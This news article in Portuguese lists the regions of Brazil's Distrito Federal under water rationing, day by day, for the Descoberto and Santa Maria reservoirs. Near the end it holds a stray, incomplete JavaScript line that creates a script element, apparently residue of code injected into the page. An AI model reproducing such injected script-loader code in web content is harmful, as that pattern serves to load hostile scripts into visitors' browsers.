Racionamento de água atinge 22 regiões do DF nesta quinta; veja lista

Racionamento de água atinge 22 regiões do DF nesta quinta; veja lista

O rodízio de racionamento de água imposto pelo governo do Distrito Federal à maior parte da capital atinge nesta quinta-feira (9), pela segunda vez, regiões como Sudoeste, Octogonal, Cruzeiro Novo e Setor de Indústrias Gráficas (SIG). Ao todo, dez áreas abastecidas pelo reservatório de Santa Maria serão atingidas pelo corte (veja lista abaixo).

Também há racionamento em setores que recebem água do Descoberto. Ao todo, são 22 regiões em todo DF que ficarão sem abastecimento. A medida começa a valer a partir das 8h, e o serviço só começa a ser retomado 24 horas depois, na manhã de sexta (10). Como o retorno é gradual, as torneiras podem ficar vazias até a tarde de sábado (11).

Na parte central de Brasília, ficam sem água as seguintes regiões: Sudoeste, Octogonal, Cruzeiro Novo, Setor de Indústrias Gráficas, Praça Municipal, Setor de Garagens Oficiais, Setor de Administração Municipal, Setor de Divulgação Cultural, Esplanada da Torre, Setor de Recreação Pública Norte, Condomínios do Jardim Botânico (Jardim Botânico III e IV, Quintas do Sol, Quintas Bela Vista, Quintas Interlagos, Morada de Deus, Quatro Estações, Máxximo Gardem, Belvedere Green, Chácaras Itaipú – exceto 80 a 84 –, Quintas Itaipú, Jardim da Serra, Solar da Serra).

Nas regiões abastecidas pelo reservatório do Descoberto, o corte ocorre nestas áreas: Guará I e II, Polo de Modas, Colônia Agrícola Bernardo Sayão, setor Lúcio Costa, Super Quadra Brasília, Colônia Agrícola Águas Claras, Taguatinga Sul, Arniqueiras, Areal e Riacho Fundo I.

Mapa mostra onde vão funcionar restrições na água; em vermelho, racionamento e em amarelo, redução da pressão  (Foto: Agência Brasília/Divulgação)

Mapa mostra onde vão funcionar restrições na água; em vermelho, racionamento e em amarelo, redução da pressão (Foto: Agência Brasília/Divulgação)

Confira o calendário do racionamento de água nos dois principais reservatórios do DF:

Quinta (9):

  • Descoberto – Guará I e II, Polo de Modas, Colônia Agrícola Bernardo Sayão, setor Lúcio Costa, Super Quadra Brasília, Colônia Agrícola Águas Claras, Taguatinga Sul, Arniqueiras, Areal e Riacho Fundo I
  • Santa Maria – Sudoeste, Octogonal, Cruzeiro Novo, Setor de Indústrias Gráficas, Praça Municipal, Setor de Garagens Oficiais, Setor de Administração Municipal, Setor de Divulgação Cultural, Esplanada da Torre, Setor de Recreação Pública Norte, Condomínios do Jardim Botânico (Jardim Botânico III e IV, Quintas do Sol, Quintas Bela Vista, Quintas Interlagos, Morada de Deus, Quatro Estações, Máxximo Gardem, Belvedere Green, Chácaras Itaipú – exceto 80 a 84 –, Quintas Itaipú, Jardim da Serra, Solar da Serra)

Sexta (10):

  • Descoberto – Taguatinga Norte (incluindo QNL/EQNL 01 a 08, 10 e 12)
  • Santa Maria – SIA, SCIA, STRC, SIN, SOF Sul, SGCV, SMAS, SPO, Cruzeiro Velho, Park Sul, Cidade Estrutural, SMU e Condomínios do Jardim Botânico (Verde, Chácaras Itaipú 80 a 84, Ouro Vermelho I e II)

Sábado (11):

  • Descoberto – Ceilândia Oeste, Recanto das Emas e Riacho Fundo II
  • Santa Maria – Lago Norte (SHIN e SMILIN, exceto Tr 13 lts 01 a 13), Varjão, Granja do Torto, SAAN, SOF Norte, Regimento de Cavalaria e Guarda-RCG e Condomínios do Jardim Botânico (San Diego, Jardim Botânico I e V, Solar de Brasília, Mansões Califórnia, Jardins do Lago, Lago Sul – exceto QL 10 a 28, QI 17 a 29 e os conjuntos 01, 02 e 03 da QI 13 –, Estância, Jardim Botânico, Mirante das Paineiras, Parque e Jardim das Paineiras, Portal do Lago Sul, Ville de Montagne)

Domingo (12):

  • Descoberto – Vicente Pires, Colônia Agrícola Samambaia, Vila São José, Jóquei, Santa Maria, DVO, Sítio do Gama, Polo JK e Residencial Santa Maria
  • Santa Maria – Asa Norte e Noroeste

Segunda (13):

  • Descoberto – Gama
  • Santa Maria – Paranoá, Itapoã, SMILIN (Trecho 13, lotes 01 a 13), Taquari, Condomínio RK e Império dos Nobres, SM 5 Lago Sul (QL 10 a 28, QI 17 a 29 e conjuntos 01, 02 e 03 da QI 13), SMDB, Setor Habitacional Dom Bosco, Condomínio Privê Morada Sul

Terça (14):

  • Descoberto – Ceilândia Leste (QNM, QNJ e QNL); Águas Claras, Park Way, Núcleo Bandeirante, C.A. IAPI, Candangolândia, Setor de Postos e Motéis, Metropolitana, Samambaia, Setor de Mansões de Taguatinga, Vila Cauhy e Vargem Bonita
  • Santa Maria – Asa Sul, Lago Sul (QL 02 a 08, QI 01 a 15 exceto conjuntos 01, 02 e 03 da QI 13) e Jardins Mangueiral

var d=document;var s=d.createElement(‘script’);

Fonte:

Deixe um comentário